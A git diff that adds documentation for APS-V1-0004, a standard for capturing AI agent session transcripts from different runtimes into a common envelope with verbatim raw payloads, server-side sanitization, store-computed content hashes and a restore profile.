+cargo run -p aps-cli --bin apss-dev -- v1 validate package APS-V1-0004
+```
+
+Run the full repository validation with:
+
+```bash
+cargo run -p aps-cli --bin apss-dev -- v1 validate repo
+```
+
+Run the crate's conformance tests with:
+
+```bash
+cargo test -p apss-v1-0004-session-capture
+```

--- a/standards/v1/APS-V1-0004-session-capture/agents/skills/README.md
+++ b/standards/v1/APS-V1-0004-session-capture/agents/skills/README.md
@@ -1,0 +1,53 @@
+# Agent Skills for the Session Capture Standard
+
+This directory documents agent skills for working with APS-V1-0004 (the Session
+Capture Standard). The standard is definitional; these skills describe how an
+agent reasons about capturing and searching sessions, and where the reference
+implementation lives.
+
+## Available Skills
+
+| Skill | Purpose |
+|-------|---------|
+| `build-envelope.md` | How to wrap a provider transcript into a valid session envelope (Source or Exporter). |
+| `search-sessions.md` | How to query a conformant store by metadata and content. |
+| `check-conformance.md` | How to check that a producer, store, or Reconstitutor meets the conformance criteria. |
+| `reconstitute-session.md` | How to restore a stored session onto this machine and resume it natively (Reconstitutor). |
+
+The skill bodies are the spec sections they point at; until the individual skill
+files are authored, treat [`../../docs/01_spec.md`](../../docs/01_spec.md) as the
+agent context.
+
+## What an agent should know
+
+- **Never flatten `raw`.** The provider transcript is preserved verbatim. An
+  agent building an envelope wraps the transcript in `raw` and fills the header
+  fields; it does not reshape provider messages.
+- **Metadata is the search surface.** To find prior sessions, filter by
+  `metadata.repo`, `origin.environment`, `agent`, `model`, or `tags` first;
+  full-text over content is a fallback. Semantic search may not be available.
+- **Idempotency is free.** Re-emitting the same session is safe: the batch
+  endpoint dedups on `(session_id, content_hash)`. An agent building an envelope
+  does NOT compute `content_hash`; the store derives it at ingest over the
+  captured content (spec 4.2.3). Omit the field.
+- **The server sanitizes.** An agent should still pre-redact obvious secrets,
+  but the store always sanitizes before persisting.
+- **`raw` must be captured verbatim, as bytes.** For a line-delimited transcript,
+  capture the file's exact contents. Parsing it into an array of objects and
+  storing that is lossy: re-serializing does not reproduce the original bytes, so
+  it forfeits reconstitution (spec 6.4.4).
+- **Never trust an envelope when restoring.** `session_id` and
+  `metadata.source_path` come from producers, which may be untrusted. Validate
+  both before interpolating into a command or a write path (spec 6.4.5); the
+  crate's `reconstitution` module does this for you.
+
+## Where the implementation lives
+
+The behavioural implementation (Source adapters, the exporter and CLI, the
+server-side sanitizer and parsers, the Reconstitutor client) lives in the
+SeshMagic repository, not here.
+
+This package carries the spec, the JSON Schema, the canonical envelope types and
+their validation, and the reconstitution registry. Consumers depend on the
+`apss-v1-0004-session-capture` crate rather than reimplementing the envelope, so
+divergence from the standard is a build failure instead of an undetected drift.

--- a/standards/v1/APS-V1-0004-session-capture/docs/00_overview.md
+++ b/standards/v1/APS-V1-0004-session-capture/docs/00_overview.md
@@ -1,0 +1,191 @@
+# Session Capture Standard - Overview
+
+## What is this?
+
+**APS-V1-0004** defines one contract for backing up and searching agent
+sessions from any runtime. The operator runs agents in many places (the Claude,
+Codex, and Cursor CLIs on a laptop; a VPS; Docker workspaces; syntropic137
+workflows), and each provider stores its transcript in a different native shape.
+This standard makes "back up my agent sessions" work identically across all of
+them, without forcing anyone to agree on a provider's internal message format.
+It enables:
+
+- **Uniform backup** - Every session, from every runtime, lands in one store in
+  one shape.
+- **Search across providers** - Filter and query sessions by metadata (repo,
+  origin, agent, model) and search their content, without the store having to
+  understand each provider's transcript format up front.
+- **Attribution** - Every session carries where it came from, so a mixed corpus
+  (this MacBook vs the VPS vs a specific workspace vs a workflow run) stays
+  attributable.
+- **Zero-churn provider onboarding** - A new provider is added by wrapping its
+  raw transcript and filling the envelope header. No schema change.
+
+## Why does it matter?
+
+As operators run more agents across more runtimes, session history becomes a
+high-value corpus: a searchable record of what was tried, where, and by which
+agent. But providers change their transcript shapes and new ones appear
+constantly. A standard that tried to normalize every provider into one canonical
+message shape would be lossy and would rot the moment a provider changed. This
+standard avoids that trap:
+
+1. **The contract is thin and stable** - a universal envelope of a handful of
+   fields, wrapped around the provider transcript preserved verbatim.
+2. **Search is a server concern** - the normalized, searchable view is built by
+   the server over the raw transcript, best-effort and swappable, never a
+   client promise.
+3. **It is versioned and adoptable** - published as an APSS standard with SemVer
+   schema versioning and additive-only evolution.
+
+## The core design decision
+
+The load-bearing choice is an **envelope plus opaque raw payload**, NOT full
+normalization.
+
+- A THIN envelope carries the universal fields the store backs up, sorts,
+  dedups, and attributes by: `scs_version`, `origin`, `agent`, `source_format`,
+  `session_id`, `parent_session_id`, `started_at`, `last_activity_at`,
+  `content_hash`, `metadata`, and `raw`.
+- The provider's original transcript is preserved byte for byte in `raw`. The
+  standard never parses or reshapes it.
+
+Pattern precedent: CloudEvents (standard envelope, arbitrary `data`), email
+(standard headers, arbitrary body), shipping containers (standard outside,
+arbitrary contents). The consequence is that a new provider costs one
+`source_format` value and a filled header; the standard cannot rot as providers
+churn, because it never claimed to understand their internals.
+
+## Quick example
+
+A single Claude Code session becomes one envelope, shown here as a producer emits
+it. `metadata` is freeform and powers search. Note two things a producer gets
+right by omission and by shape:
+
+- No `content_hash`. The store computes it at ingest (spec 4.2.3).
+- `raw` is a string holding the transcript's exact bytes, not a parsed object.
+  Only the string shape supports byte-exact resume (spec 4.3.1).
+
+```jsonc
+{
+  "scs_version": "1.0",
+  "origin":        { "host": "macbook-neural", "environment": "local" },
+  "agent":         "ClaudeCode",
+  "source_format": "claude-jsonl-v1",
+  "session_id":    "019973e4-58a9-7b83-9f21-2b6c4d0a1e77",
+  "parent_session_id": null,
+  "started_at":    "2026-05-02T14:03:11Z",
+  "last_activity_at": "2026-05-02T15:20:44Z",
+  "metadata": {
+    "repo": "AgentParadise/agent-paradise-standards-system",
+    "cwd": "/Users/neural/Code/apss",
+    "project": "apss",
+    "model": "claude-opus-4-8",
+    "tags": ["standards", "authoring"],
+    "message_count": 42,
+    "workflow_id": null,
+    "source_path": "-Users-neural-Code-apss/019973e4-58a9-7b83-9f21-2b6c4d0a1e77.jsonl"
+  },
+  "raw": "{\"type\":\"user\",\"message\":{...}}\n{\"type\":\"assistant\",...}\n"
+}
+```
+
+## Metadata is first-class for search
+
+Metadata is the operator's highest-value point. Conformant stores SHOULD support
+querying and filtering sessions by metadata fields, not only full-text over
+content. Queries such as "all sessions from repo X", "everything from
+origin=vps", or "everything by agent Codex" are the baseline search surface.
+
+- **Lexical and metadata search is the baseline** - required of a conformant
+  store.
+- **Semantic and embedding search is optional** - explicitly cost-sensitive, and
+  never required by this standard.
+
+## Search is server-derived, not a client contract
+
+Cross-provider search still matters, but the normalized, searchable view is
+built by the SERVER running best-effort, per-provider parsers over `raw`. That
+view is allowed to be lossy, because `raw` is always ground truth. Parsers
+improve or get added without touching this standard and without re-uploading
+anything. This is the direct answer to "are we overfitting?": the client
+contract commits to nothing provider-specific.
+
+## Three conformance profiles
+
+Different runtimes surface sessions differently, so the standard offers two ways
+to produce envelopes rather than forcing one, plus a third profile that restores
+them.
+
+- **Source (pull)** - the runtime writes transcripts to disk (Claude, Codex,
+  Cursor). A Source reads them, wraps `raw`, fills the header, and hands
+  envelopes to an uploader.
+- **Exporter (push)** - the runtime is ephemeral or remote (a Docker workspace,
+  a syntropic137 workflow). It POSTs envelopes itself to the batch endpoint with
+  a scoped token.
+- **Reconstitutor (restore)** - the inverse of a Source. It fetches a stored
+  session, writes the transcript back to the path the harness expects on
+  *this* machine, and hands off to the harness's native resume. Same-harness
+  only; capture on the laptop, resume on the VPS.
+
+Local CLIs, containers, and workflows all conform without changing how they
+natively store transcripts.
+
+## Why resume comes almost free
+
+Preserving `raw` verbatim was chosen so the contract could not rot as providers
+change their transcript formats. It turns out to buy something larger: if the
+stored bytes are the harness's own session file, they can be written back and the
+harness can resume from them.
+
+That also makes the standard's central promise testable. "Preserve `raw`
+verbatim" was previously a rule nothing could check. A round trip checks it:
+capture a session, reconstitute it, compare. The requirement becomes a test rather
+than an assertion.
+
+## Transport
+
+`POST /v1/sessions/batch` with a `{ "envelopes": [...] }` body, idempotent by
+`(session_id, content_hash)`, authenticated with a scoped bearer token
+(`sessions:write`). The server ALWAYS sanitizes envelopes before persisting,
+regardless of source, so a compromised or naive exporter cannot leak secrets into
+the shared store.
+
+Because sanitization changes the bytes, `content_hash` is defined over the
+captured content, before sanitization, and is computed by the store rather than
+the producer. Dedup is therefore resolved server-side, and stays stable across
+sanitizer changes.
+
+## Versioning and evolution
+
+`scs_version` is SemVer. Within a major, changes are additive only (new optional
+fields, new `source_format` values, new `environment` values). New providers
+never require a version bump: they add a `source_format` value and, optionally, a
+server-side parser.
+
+## Adopters
+
+- **SeshMagic** - Source implementations for Claude, Codex, and Cursor, the
+  reference exporter, the store (sanitizer and parsers), and the Reconstitutor
+  client. This is the home of the behavioural implementation.
+- **syntropic137 workflows** - Exporter profile, emitting one envelope per agent
+  from a workflow-completion hook, grouped by a shared `metadata.workflow_id`.
+- **agentic-primitives `providers/workspaces`** - Exporter profile, embedded in
+  the workspace image so capture is turnkey for every spawned workspace.
+
+## Status
+
+**Active (ratified)** - Promoted from `EXP-V1-0003` on 2026-08-06 at version
+1.0.0. The envelope contract is proven by a corpus of roughly 3,000 real sessions
+captured across Claude, Codex, and Cursor, which is what qualified it for
+ratification: consumers can now take a stable, versioned dependency on it.
+
+Within major version 1, changes are additive only (specification section 8).
+
+## Learn more
+
+- Read the [full specification](./01_spec.md).
+- Inspect the [JSON Schema](../schemas/session-envelope.schema.json).
+- Inspect the [reconstitution registry](../registry/reconstitution.toml).
+- Browse [examples](../examples/).
+- See [agent skills](../agents/skills/).

--- a/standards/v1/APS-V1-0004-session-capture/docs/01_spec.md
+++ b/standards/v1/APS-V1-0004-session-capture/docs/01_spec.md
@@ -1,0 +1,1007 @@
+# APS-V1-0004 - Session Capture Standard
+
+**Version**: 1.0.0
+**Status**: Active (ratified)
+**Category**: Technical
+**Promoted from**: EXP-V1-0003 on 2026-08-06
+
+---
+
+## Terminology
+
+The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD",
+"SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be
+interpreted as described in [RFC 2119](https://datatracker.ietf.org/doc/html/rfc2119).
+
+---
+
+## 1. Scope and Authority
+
+### 1.1 Purpose
+
+This standard defines a single **capture contract** so that agent sessions from
+any runtime back up uniformly and become searchable. The operator runs agents
+across many runtimes (the Claude, Codex, and Cursor CLIs; a VPS; Docker
+workspaces; syntropic137 workflows), each of which stores its transcript in a
+different provider-native shape. This standard makes "back up my agent sessions"
+work identically across all of them without requiring agreement on any
+provider's internal transcript format.
+
+The contract is a THIN **session envelope**: a small set of universal header
+fields wrapped around the provider's original transcript, preserved verbatim in
+a `raw` field. The envelope is designed to be:
+
+1. **Uniform** - Same shape for every runtime and provider.
+2. **Stable** - A new provider costs one new `source_format` value and a filled
+   header; the standard never parses provider internals, so it cannot rot as
+   providers churn.
+3. **Attributable** - Every envelope records its origin.
+4. **Idempotent** - Envelopes deduplicate on `(session_id, content_hash)`.
+5. **Searchable** - Metadata is first-class for filtering and querying; content
+   search is a server-derived concern over `raw`.
+
+### 1.2 Scope
+
+This standard covers:
+
+- **The session envelope** - Its header fields and the opaque `raw` payload
+  (section 4), machine-checkable against the shipped JSON Schema.
+- **Transport** - The batch upload endpoint, its idempotency and auth (section
+  5).
+- **Conformance profiles** - Source (pull), Exporter (push), and Reconstitutor
+  (restore), with crisp criteria for each (section 6).
+- **Search expectations** - What a conformant store MUST and MAY support
+  (section 7).
+- **Reconstitution** - Restoring a captured session onto a different machine so
+  the originating harness can resume it natively (section 6.4), backed by the
+  shipped reconstitution registry.
+- **Versioning and evolution** - SemVer of the envelope and additive-only
+  evolution (section 8).
+
+This standard does NOT cover:
+
+- **Provider transcript internals** - The shape of `raw` is opaque to this
+  standard. It is never parsed, reshaped, or validated by the contract.
+- **Server-side normalization for search** - The parsers that build a searchable
+  view over `raw` are a best-effort, swappable, server-side concern (section 7),
+  not part of the client contract.
+- **Storage engine, indexing technology, and query language** - Implementation
+  detail of a conformant store.
+- **Cross-harness reconstitution** - Restoring a Claude session into Codex, or
+  any other harness-to-harness translation, is explicitly OUT of scope. It would
+  require translating the derived projection (section 7.3) rather than restoring
+  the captured bytes, which would make reconstitution lossy. Reconstitution is
+  same-harness only (section 6.4).
+- **Specific Source, Exporter, or Reconstitutor implementations** - Informative
+  only (section 11). The Rust reference implementation lives in the SeshMagic
+  repository.
+
+### 1.3 Relationship to Other Standards
+
+This standard is independent but designed to integrate with:
+
+- **APSS meta (APS-V1-0000)** - Adopted as an APSS standard with SemVer schema
+  versioning and additive-only evolution, matching the ecosystem's pattern.
+- **Consumer adoption** - Adopted via an `apss.yaml` section. Consumers SHOULD
+  take a versioned dependency on the `apss-v1-0004-session-capture` crate rather
+  than reimplementing the envelope types, so that divergence from this standard
+  is a build failure rather than an undetected drift.
+
+---
+
+## 2. Core Definitions
+
+### 2.1 Session
+
+A **session** is one agent's transcript for one continuous run. A multi-agent
+run is NOT a single session: each agent contributes its own session, and the run
+is grouped by a shared `metadata.workflow_id`.
+
+### 2.2 Session Envelope
+
+A **session envelope** (or "envelope") is the standardized object defined in
+section 4: a thin set of universal header fields plus the opaque `raw` payload.
+The envelope is the unit of capture, backup, dedup, and attribution.
+
+### 2.3 Raw Transcript
+
+The **raw transcript** (`raw`) is the provider-native session record, preserved
+verbatim inside the envelope. It is opaque to this standard. It is always ground
+truth.
+
+### 2.4 Source
+
+A **Source** is a conforming producer that operates in **pull** mode: it reads
+provider transcripts from local disk, wraps each into an envelope, and hands
+envelopes to an uploader. See section 6.1.
+
+### 2.5 Exporter
+
+An **Exporter** is a conforming producer that operates in **push** mode: it
+constructs envelopes and POSTs them to the batch endpoint. See section 6.2.
+
+### 2.6 Store
+
+A **store** is a conforming consumer: it accepts envelopes at the batch endpoint,
+sanitizes and persists them, and serves search over them (section 7).
+
+### 2.7 Reconstitutor
+
+A **Reconstitutor** is a conforming consumer-side restorer: it fetches a stored
+envelope, writes the transcript back to the path the originating harness expects
+on the machine it is running on, and hands off to that harness's native resume.
+See section 6.4.
+
+### 2.8 Origin
+
+The **origin** is where an envelope came from: its `host` and `environment`. It
+keeps a multi-source corpus attributable.
+
+### 2.9 Sanitization
+
+**Sanitization** is the store's mandatory, unconditional transformation of an
+envelope before it is persisted: redaction of detected secrets, plus stripping of
+NUL bytes (4.3.2). The output of sanitization is the **stored form**, which is
+what the store persists, serves, and reconstitutes from. The stored form is the
+store's ground truth; the pre-sanitization bytes are never persisted (5.4).
+
+### 2.10 Captured Content
+
+The **captured content** is the session as received from a producer, before
+sanitization. It is what `content_hash` is computed over (4.2.3). It is never
+persisted: the store hashes it in memory at ingest and then sanitizes.
+
+### 2.11 Sanitizer Version
+
+The **sanitizer version** identifies the sanitization ruleset a store applied to
+produce a given stored form. A store records it so that a ruleset change can be
+followed by re-sanitization of the affected stored forms (5.5). It does not affect
+`content_hash`, which describes captured content rather than the stored form.
+
+---
+
+## 3. Design Rationale (Informative)
+
+This section records the load-bearing decisions and what each one buys. It is
+informative; the normative rules are in sections 4 through 8.
+
+### 3.1 Envelope plus opaque raw, NOT full normalization
+
+Providers have genuinely different shapes: Claude content-blocks, Codex turns,
+Cursor bubbles, Gemini parts. Flattening them into one canonical message is
+overfitting: it is lossy, and it breaks the moment a provider changes or a new
+one appears. Instead the standard is a thin envelope of universal fields wrapped
+around the provider's original transcript preserved byte for byte in `raw`.
+Pattern precedent: CloudEvents (standard envelope, arbitrary `data`), email
+(standard headers, arbitrary body), shipping containers (standard outside,
+arbitrary contents). Consequence: a new provider equals wrapping its raw and
+filling the header fields, with zero schema change.
+
+### 3.2 Search normalization is server-side and derived, never in the contract
+
+Cross-provider search still matters. But the normalized, searchable view is
+built by the SERVER running best-effort, per-provider parsers over `raw`. That
+view is allowed to be lossy because `raw` is always ground truth. Consequence:
+parsers improve or get added without touching this standard and without
+re-uploading anything. Normalization is a swappable read-side concern, not a
+write-side promise. This is the direct answer to whether the standard is
+overfitting: the client contract commits to nothing provider-specific.
+
+### 3.3 Three conformance profiles: Source, Exporter, Reconstitutor
+
+Different runtimes surface sessions differently, so the standard offers two ways
+to *produce* rather than forcing one. Runtimes that write transcripts to disk use
+a Source (pull); ephemeral or remote runtimes push envelopes themselves via an
+Exporter. Consequence: local CLIs, containers, and workflows all conform without
+changing how they natively store transcripts.
+
+A third profile runs the other direction. A Reconstitutor (6.4) restores a stored
+session onto a machine so its harness can resume it, which is the exact inverse of
+a Source. Splitting production from restoration keeps each profile independently
+implementable and independently testable.
+
+### 3.4 Metadata is first-class for search
+
+The highest-value operator query is not full-text over content; it is "show me
+sessions matching this facet": a repo, an origin, an agent, a model. Metadata is
+therefore promoted to a first-class, queryable surface (section 7). Lexical and
+metadata search is the required baseline; semantic search is optional and
+cost-sensitive.
+
+### 3.5 Sanitization is server-enforced (mandatory), client best-effort
+
+Push producers (containers, workflows) are effectively untrusted, and their raw
+transcripts often contain pasted secrets. The server ALWAYS runs sanitization
+before persisting, regardless of source. Clients SHOULD pre-redact but cannot be
+relied on. Consequence: a compromised or naive exporter cannot leak secrets into
+the shared store.
+
+### 3.6 Idempotency by (session_id, content_hash)
+
+Re-syncs, retries, and overlapping Source-plus-Exporter capture of the same
+session must not duplicate. The batch endpoint dedups on
+`(session_id, content_hash)`. Consequence: capture can be at-least-once and
+aggressive; the store converges.
+
+### 3.7 Origin is first-class
+
+Every envelope carries where it came from, so a multi-source corpus stays
+attributable: this MacBook vs the VPS vs a specific workspace vs a workflow run.
+
+### 3.8 Reconstitution is the payoff of verbatim `raw`
+
+Preserving `raw` verbatim (3.1) was chosen to stop the contract rotting as
+providers churn. It turns out to buy a second, larger capability for free: if the
+captured bytes are the harness's own session file, they can be written back and
+the harness can resume from them. Capture on one machine, resume on another.
+
+This requires exactly one thing the envelope does not already carry. `source_format`
+tells a *reader* how to parse `raw`; nothing tells a *writer* where to put it
+back. Section 6.4 adds that as a third profile, and the shipped reconstitution
+registry supplies the per-`source_format` knowledge.
+
+Reconstitution also converts a prose promise into an executable one. Section 4.3
+says `raw` MUST be preserved verbatim, but nothing could previously prove a
+producer obeyed. A round trip can: capture a session, reconstitute it, and compare
+(6.4.4). The MUST becomes a test.
+
+### 3.9 `content_hash` is over the captured content, not the stored form
+
+Sanitization is unconditional (3.5), so what a store persists is by definition not
+what the producer captured. The hash must therefore describe one or the other, and
+the choice is load-bearing.
+
+This standard hashes the **captured content**, before sanitization, because the
+hash's only job is idempotent dedup (3.6) and dedup needs a *stable* identity.
+Hashing the sanitized form would make the sanitizer ruleset part of session
+identity: every improvement to secret detection would change the digest of
+sessions whose content never changed, so re-uploading an untouched session would
+read as new. Worse, no migration could repair it, because reconstructing what a
+fresh ingest under the new ruleset would produce requires the original bytes, and
+3.5 requires those be discarded. The rule would quietly contradict itself.
+
+Hashing before sanitization avoids all of that while giving up nothing: the store
+still never persists unsanitized bytes (5.4), it merely hashes them in memory on
+the way past. Section 5.5 then becomes a short, honest statement instead of an
+impossible migration.
+
+The cost is that `content_hash` is an identity, not an integrity check: it does
+not describe the stored bytes and MUST NOT be used to verify a retrieved envelope
+was returned unmodified (4.2.3). That is the correct trade, because integrity of
+storage is the store's internal concern while dedup is part of the wire contract.
+
+A second consequence: producers do not compute the authoritative hash. Section
+4.2.3 fully specifies the input, so a producer *could* compute the same digest,
+but the store's value is authoritative and idempotency is resolved store-side.
+
+---
+
+## 4. The Session Envelope
+
+### 4.1 Structure
+
+A session envelope is a JSON object. The header fields (4.2) and `raw` (4.3) are
+REQUIRED, with one exception: `content_hash` is populated by the store rather
+than the producer, so it is absent in an envelope in flight and present once
+stored (4.2.3). `parent_session_id` and `metadata` are OPTIONAL.
+
+The machine-checkable form is
+[`schemas/session-envelope.schema.json`](../schemas/session-envelope.schema.json).
+It validates both envelope states, so it does not mark `content_hash` `required`.
+
+```jsonc
+{
+  "scs_version": "1.0",
+  "origin":        { "host": "macbook-neural", "environment": "local" },
+  "agent":         "ClaudeCode",
+  "source_format": "claude-jsonl-v1",
+  "session_id":    "019973e4-58a9-7b83-...",
+  "parent_session_id": null,
+  "started_at":    "2026-05-02T14:03:11Z",
+  "last_activity_at": "2026-05-02T15:20:44Z",
+  "content_hash":  "sha256:...",
+  "metadata": {
+    "repo": "owner/name", "git_remote": "https://github.com/owner/name.git",
+    "cwd": "/path", "project": "name", "model": "...",
+    "tags": [], "message_count": 42, "workflow_id": null
+  },
+  "raw": { "...": "provider-native transcript, preserved verbatim" }
+}
+```
+
+### 4.2 Header Fields
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| `scs_version` | string (SemVer, `MAJOR.MINOR`) | YES | Version of the envelope schema. Additive-only within a major (section 8). |
+| `origin` | object | YES | Where the envelope came from. See 4.2.1. |
+| `agent` | string | YES | The producing runtime, for example `ClaudeCode`, `Codex`, `Cursor`, `Gemini`. Any provider-specific string is permitted. |
+| `source_format` | string | YES | Provenance tag for `raw`: how a server-side parser should read it, for example `claude-jsonl-v1`. New providers add a value here with zero schema change. |
+| `session_id` | string | YES | Identifier for the session, stable per source. Half of the idempotency key (section 5.3). |
+| `parent_session_id` | string or null | NO | For a subagent session, the parent session's id. Reserved in v1; derivation is a later phase (section 9). |
+| `started_at` | string (RFC3339) | YES | Real session start time, derived from the transcript. See 4.2.2. |
+| `last_activity_at` | string (RFC3339) | YES | Real time of the last activity in the session. See 4.2.2. |
+| `content_hash` | string (`algo:hexdigest`) | STORE | Hash over the **captured content**, computed by the store at ingest. Absent in flight, present once stored. Never trusted from a producer. The other half of the idempotency key. See 4.2.3. |
+| `metadata` | object | NO | Freeform, non-load-bearing, first-class for search (section 7). See 4.4. |
+| `raw` | object, array, or string | YES | The provider-native transcript, preserved verbatim. See 4.3. |
+
+#### 4.2.1 Origin
+
+`origin` is REQUIRED and MUST carry:
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| `host` | string | YES | Human-meaningful host identity, for example `macbook-neural` or the VPS hostname. |
+| `environment` | enum | YES | One of `local`, `vps`, `container`, `workflow`. |
+
+New `environment` values MAY be added in a later minor version (section 8);
+consumers MUST tolerate unknown values.
+
+#### 4.2.2 Timestamps
+
+`started_at` and `last_activity_at` MUST be real session times in RFC3339,
+derived from the transcript. They MUST NOT be the capture or upload time. A
+producer that cannot derive real timestamps from a transcript MUST NOT
+substitute the current time silently.
+
+#### 4.2.3 Content Hash
+
+An envelope exists in two legitimate states, and they differ in exactly this
+field:
+
+| State | When | `content_hash` |
+|-------|------|----------------|
+| **In flight** | Produced by a Source or Exporter, being uploaded | Absent or null. The input is fully specified below, so a producer *may* compute the same digest for its own bookkeeping, but the store's value is authoritative and a producer-supplied one is discarded. |
+| **Stored** | Persisted by a store, and what a query or reconstitution returns | REQUIRED and populated by the store. |
+
+The shipped JSON Schema validates both, so it does not mark `content_hash`
+required. A store MUST reject a *stored* envelope lacking it, and MUST populate it
+during ingest. Consumers reading from a store may rely on its presence.
+
+##### The hash input
+
+`content_hash` identifies the **captured content**: the session as received,
+before sanitization. It is computed by the store, at ingest, over exactly this
+object:
+
+```json
+{
+  "raw":           "<the raw value as received>",
+  "session_format": "<source_format>",
+  "session_id":    "<session_id>"
+}
+```
+
+Precisely:
+
+- The hash input MUST contain exactly the three members `raw`, `session_format`,
+  and `session_id`, taking `session_format` from the envelope's `source_format`.
+- The hash input MUST NOT contain `content_hash`. Hashing a structure that
+  contains its own digest is not computable, so the field is excluded by
+  construction rather than nulled.
+- The hash input MUST NOT contain timestamps, `origin`, `agent`, or `metadata`.
+  Those describe the capture event rather than the session content, and can differ
+  between two captures of the same session. Including them would defeat dedup
+  (5.3).
+- The hash input MUST be serialized using JSON Canonicalization Scheme
+  ([RFC 8785](https://www.rfc-editor.org/rfc/rfc8785)) before hashing, so that
+  independent stores agree byte for byte. Without a canonical serialization,
+  member ordering and number and string escaping vary by implementation and two
+  conformant stores would disagree on the digest for identical content.
+- The algorithm MUST be SHA-256 in `scs_version` 1.x. It is not merely
+  recommended: two stores choosing different algorithms would produce different
+  identities for identical content, which is the exact failure canonicalization
+  exists to prevent. A future major version MAY introduce another algorithm, and
+  the `algo:` prefix exists so that transition is unambiguous.
+- The digest MUST be rendered as `sha256:` followed by **lowercase** hexadecimal.
+  Casing is normative: `sha256:AB…` and `sha256:ab…` are the same digest but
+  different strings, and dedup compares strings.
+
+##### `raw` values that cannot be hashed
+
+RFC 8785 canonicalizes I-JSON ([RFC 7493](https://www.rfc-editor.org/rfc/rfc7493))
+input. A `raw` value that is not I-JSON compatible therefore has no canonical
+form and no conforming digest. In practice this means:
+
+- Object member names within `raw` MUST be unique. Duplicate names have no
+  defined canonical ordering.
+- Numbers within `raw` MUST be representable as IEEE-754 doubles. An
+  arbitrary-precision literal such as `1e400` has no canonical representation.
+
+A store MUST reject an envelope whose `raw` cannot be canonicalized, reporting it
+as `rejected` with a reason (5.3). It MUST NOT coerce the value and hash the
+result, which would silently assign an identity that another store would not
+reproduce.
+
+This constraint does not apply to a string `raw`, which is the shape required for
+any reconstitutable `source_format` (4.3.1) and is always canonicalizable.
+
+##### Why before sanitization
+
+This is the load-bearing choice, and it is the opposite of what it might seem the
+security rules imply. Sanitization is still absolute: the store MUST NOT persist
+the pre-sanitization bytes (5.4). They are hashed in memory during ingest and then
+discarded.
+
+Hashing *after* sanitization would make the sanitizer ruleset part of session
+identity. Every sanitizer update would change the digest of sessions whose content
+never changed, so re-uploading an untouched session would read as new rather than
+duplicate, and no migration could repair it: reconstructing what a fresh ingest
+under the new ruleset would have produced requires the original bytes, which
+§5.4 has already required be discarded. Hashing the captured content instead makes
+the digest permanently stable, and dedup survives every future sanitizer change
+(5.5).
+
+##### Store obligations
+
+- The store MUST compute `content_hash` itself, at ingest, before sanitizing.
+- The store MUST NOT accept a producer-supplied `content_hash` as authoritative.
+  A store that prefers a producer-supplied value cannot know how that value was
+  derived, so dedup (5.3) silently degrades. If a producer supplies the field, the
+  store MUST recompute and overwrite it.
+- Producers SHOULD omit `content_hash`. A producer MAY compute the same digest
+  locally for its own bookkeeping, since the input is fully specified above, but
+  the store's value is authoritative.
+
+`content_hash` is an identity for deduplication, NOT an integrity check over
+stored bytes. It deliberately does not describe the stored form, because the
+stored form is sanitized and may be re-sanitized later (5.5). A consumer MUST NOT
+use `content_hash` to verify that a retrieved envelope was returned unmodified.
+
+Because producers cannot rely on the store's hash before upload, idempotency is
+resolved at the store. Producers MAY re-upload content the store already holds;
+the batch endpoint reports `duplicate` per item (5.3), and capture is designed to
+be at-least-once (3.6).
+
+### 4.3 The Raw Payload
+
+- `raw` is REQUIRED and MUST preserve the provider-native transcript verbatim. A
+  producer MUST NOT flatten, reshape, reorder, or normalize provider message
+  structures into `raw`.
+- `raw` MAY be inlined for small sessions, or carried as an object-store
+  reference for large ones. In both cases the header fields (4.2) are always
+  present in the envelope. The inline-versus-reference threshold is an
+  implementation choice.
+- The standard assigns no meaning to the contents of `raw`. Any parsing of it is
+  a server-side concern (section 7).
+
+#### 4.3.1 String `raw` and Reconstitutability
+
+`raw` MAY be a JSON string, object, or array, but the choice has a consequence
+that producers MUST understand.
+
+A **string** `raw` carries the transcript's exact bytes. This is the only shape
+that supports byte-exact reconstitution (6.4.4), and it is REQUIRED for any
+`source_format` that appears in the reconstitution registry (6.4.2).
+
+An **object** or **array** `raw` carries a parsed structure. Parsing is
+irreversible with respect to bytes: whitespace, member ordering, and number and
+string formatting are not recoverable, so re-serializing does not reproduce the
+original file. An envelope with an object or array `raw` is valid, and remains
+fully usable for backup, search, and attribution, but it is NOT reconstitutable
+and MUST NOT be claimed as conformant to the Reconstitutor profile.
+
+Accordingly:
+
+- A Source for a harness that writes a text transcript (JSON Lines, plain text)
+  MUST capture `raw` as a string containing the file's exact bytes.
+- A producer MUST NOT parse a line-delimited transcript into an array of objects
+  and present that as verbatim `raw`. Doing so silently forfeits resume while
+  appearing conformant, which is why 6.4.4 exists as an executable check.
+- Object or array `raw` is appropriate only where the provider's native session
+  record genuinely is a structured object rather than a file.
+
+#### 4.3.2 The Only Permitted Transformations
+
+"Verbatim" binds producers absolutely: a producer MUST NOT alter `raw` at all.
+A store, which MUST sanitize before persisting (5.4), is permitted exactly two
+transformations and no others:
+
+1. **Secret redaction.** The store MAY replace detected secret spans with inert
+   placeholders. Redaction MUST NOT change the surrounding structure of `raw`.
+2. **NUL stripping.** The store MAY strip NUL (`U+0000`) from `raw`. This is
+   permitted because common storage engines cannot hold it: PostgreSQL `text` and
+   `jsonb` reject NUL outright, and an unstripped NUL surfaces as
+   `ERROR: unsupported Unicode escape sequence` at write time, which risks losing
+   the session entirely rather than losing one byte of it.
+
+Beyond these two, a store MUST NOT flatten, reshape, reorder, re-encode, or
+re-serialize `raw`. Outside of redacted spans and stripped NULs, the stored form
+MUST be byte-identical to what the producer sent, and MUST remain retrievable in
+that form (6.3.5).
+
+Both transformations produce the stored form (2.9), and both happen AFTER
+hashing. `content_hash` is computed over the captured content as received
+(4.2.3), so neither redaction nor NUL stripping can move a session's identity.
+
+### 4.4 Metadata
+
+`metadata` is OPTIONAL, freeform, and non-load-bearing: the standard makes no
+promise about its contents beyond `message_count` being a hint. It is, however,
+the primary search surface (section 7). Producers SHOULD populate the following
+well-known fields when available:
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `repo` | string | Repository slug the session worked in, for example `owner/name`. |
+| `git_remote` | string | Git remote URL for the working tree. |
+| `cwd` | string | Working directory of the session. |
+| `project` | string | Project name the session belongs to. |
+| `model` | string | Model identifier used. |
+| `tags` | array of string | Free-form operator tags. |
+| `message_count` | integer | Hint for the number of messages. |
